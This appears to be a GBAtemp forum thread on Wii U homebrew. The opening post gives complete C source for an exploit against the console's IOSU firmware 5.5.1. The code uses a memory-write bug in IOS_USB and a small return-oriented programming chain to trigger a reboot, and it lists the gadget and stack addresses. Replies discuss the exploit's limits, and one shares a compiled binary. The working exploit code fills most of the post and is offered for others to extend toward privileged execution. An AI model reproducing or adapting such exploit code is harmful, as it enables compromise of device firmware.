Hacking ROP from within IOS_USB (5.5.1)

Hillary_Clinton

OP
Newcomer
Trophies
XP
Country
United States
IOSU kernel exploit demonstrated here. This is just for people who would like to experiment inside IOSU. You can ignore the text below; it's old.

Hi guys. Below is an implementation of the userland IOSU exploit on the wiki. It demonstrates a simple ROP chain which will call the shutdown syscall from within IOS_USB and restart your console. (5.5.1 only.) I'm posting this here in the hope that someone might build on this and get privileged execution on the ARM, perhaps by implementing the IOS_CreateThread exploit that is detailed on the wiki, and then share it publicly.

How this works is described in detail on the wiki but you might like to know that the ROP chain overwrites the return address for the subroutine at 0x1011D968. The return address is at 0x1016AD40. The thread's stack is within the range [0x1015AE50, 0x1016AE50). You might also like to know that MEM1 is mapped R/W on the PPC side at 0xF4000000 and on the ARM side at 0x00000000.

Updated code here. The rest of the old post:

The trouble I'm having right now is I am unable to construct a larger ROP chain without it being overwritten between calls to write32. I've tried lots of different ways of moving the stack pointer around but I haven't had much luck. And of course I know there are people who have already achieved privileged execution on the ARM, but this is for the people who are waiting.

Here's what I have.

loader.c:
Code:
#include "loader.h"

void _start()
{
    /* Load a good stack */
    asm(
        "lis %r1, 0x1ab5 ;"
        "ori %r1, %r1, 0xd138 ;"
    );

unsigned int coreinit_handle;
    OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);

void(*_Exit)();
    OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);

void(*OSSleepTicks)(long long x);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);

int(*IOS_Open)(char *path, unsigned int mode);
    OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);

int(*IOS_Close)(int fd);
    OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close);

int du0h = IOS_Open("/dev/uhs/0", 0);

//int ret = write32(du0h, 0x1016BE50 - 0xF0, 0x1012EE5C); // reset syscall

#define CHAIN_START 0x1016AD40
#define SHUTDOWN 0x1012EE4C
#define SIMPLE_RETURN 0x101014E4

int ret;

ret = write32(du0h, CHAIN_START + 0x4, SIMPLE_RETURN);
    ret = write32(du0h, CHAIN_START + 0x8, SHUTDOWN);

// the following line will trigger the ROP chain
    ret = write32(du0h, CHAIN_START, SIMPLE_RETURN);

IOS_Close(du0h);

_Exit();

while (1);
}

int write32(int dev_uhs_0_handle, int arm_addr, int val) {

unsigned int coreinit_handle;
    OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);

int(*IOS_Ioctl)(int fd, unsigned int request, void *input_buffer,
        unsigned int input_buffer_len, void *output_buffer, unsigned int output_buffer_len);
    void(*DCFlushRange)(void *addr, unsigned int len);
    void(*DCInvalidateRange)(void *addr, unsigned int len);
    void(*OSSleepTicks)(long long x);
    OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
    OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);

int* pretend_root_hub = (int*)0xF5003ABC;
    int *ayylmao = (int*)0xF4500000;

ayylmao[8] = (int)ayylmao - 0xF4000000;
    ayylmao[5] = 1;
    ayylmao[520] = arm_addr - 24; // the address to be overwritten, minus 24 bytes.

pretend_root_hub[33] = (int)ayylmao - 0xF4000000;
    pretend_root_hub[78] = 0;

DCFlushRange(pretend_root_hub + 33, 200);
    DCInvalidateRange(pretend_root_hub + 33, 200);
    DCFlushRange(ayylmao, 521 * 4);
    DCInvalidateRange(ayylmao, 521 * 4);
    OSSleepTicks(0x200000);

int root_hub_index = -(0xBEA2C); // gets IOS_USB to read from the middle of MEM1

int request_buffer[] = { root_hub_index, val };
    int output_buffer[32];
    int ret = IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
    return ret;
}

loader.h:
Code:
#ifndef LOADER_H
#define LOADER_H

#include "../../../libwiiu/src/coreinit.h"
#include "../../../libwiiu/src/socket.h"
#include "../../../libwiiu/src/uhs.h"
#include "../../../libwiiu/src/types.h"

/* Application start */
void _start();
int write32(int, int, int);

#endif /* LOADER_H */

Last edited by Hillary_Clinton,
D

Deleted User

inb4 spam posts

TAKE NOTE PEOPLE: THIS IS NOT AN IOSU EXPLOIT!
It demonstrates code execution on the IOSU processor that can eventually lead to a kernel attack on the IOSU, but right now all it does is cold-boot (I think?) your console.
It is like Browserhax - useful for basic stuff but you want a kernel exploit in order to have backups, HBL and extended memory access.

thisisallowed

中国御宅族
Trophies
XP
Country
China
inb4 spam posts

TAKE NOTE PEOPLE: THIS IS NOT AN IOSU EXPLOIT!
It demonstrates code execution on the IOSU processor that can eventually lead to a kernel attack on the IOSU, but right now all it does is cold-boot (I think?) your console.
It is like Browserhax - useful for basic stuff but you want a kernel exploit in order to have backups, HBL and extended memory access.
You can't use this at all, pretty much.
You need to use the keksploit to do anything. Other than rebooting.

D

Deleted User

Huh, neat; this actually reboots my Wii U! Don't think I would use it in everyday use, but good job demonstrating Userland IOSU access. :)

Reactions: AHP_person
D

Deleted User

can i have a .elf of this? there are times when i just want to reboot console
I don't think you can compile it as .elf, but I have the .mp4 (which is probably faster to execute anyway) if you want that.

D

Deleted User

can i have a .elf of this? there are times when i just want to reboot console
If you want an HBL port (may or may not work) I might try this now. Just let me try the userland version on my console first...

D

Deleted User

HBL port complete (it actually worked on my first build, that's never happened before...)
Run this file using HBL - it can be streamed via wiiload, SendELF or can be placed inside the sd:/wiiu/apps/iosu-reboot/ folder on your SD Card.

Enjoy rebooting your console I guess...? (I had to zip it, GBATemp wouldn't let me upload the raw ELF)

@QuarkTheAwesome does this mean that we can add auto-rebooting to an exception handler? (You mentioned being able to return to the main thread before, but with limitations I can't remember).

Attachments

• iosu-reboot.elf.zip
    2.1 KB · Views: 505
Last edited by ,

Deleted member 373223

Pink = Best colour
Trophies
XP
HBL port complete (it actually worked on my first build, that's never happened before...)
Run this file using HBL - it can be streamed via wiiload, SendELF or can be placed inside the sd:/wiiu/apps/iosu-reboot/ folder on your SD Card.

Enjoy rebooting your console I guess...? (I had to zip it, GBATemp wouldn't let me upload the raw ELF)

@QuarkTheAwesome does this mean that we can add auto-rebooting to an exception handler? (You mentioned being able to return to the main thread before, but with limitations I can't remember).
thx

Trophies
Website
heyquark.com
XP
Country
Australia
Awesome to see! I hope this doesn't mean you're giving up on kernel...
Sorry I was less help lately, ARM ROP is tough to get my head around :3

@CreeperMario, you'll have to explain that differently since I'm not really sure what you mean. The work I did allowed homebrew apps to run exception handlers on their main threads (albeit with screwed-up stacks) which is much less restrictive than the default behavior. Not sure how it ties in here.

(Also I seem to have stopped getting tag notifications. Hrm.)

Site & Scene News

Popular threads in this forum

General chit-chat
Help Users
    Psionic Roshambo @ Psionic Roshambo: It's very sad and a poignant example of why preservation is so important.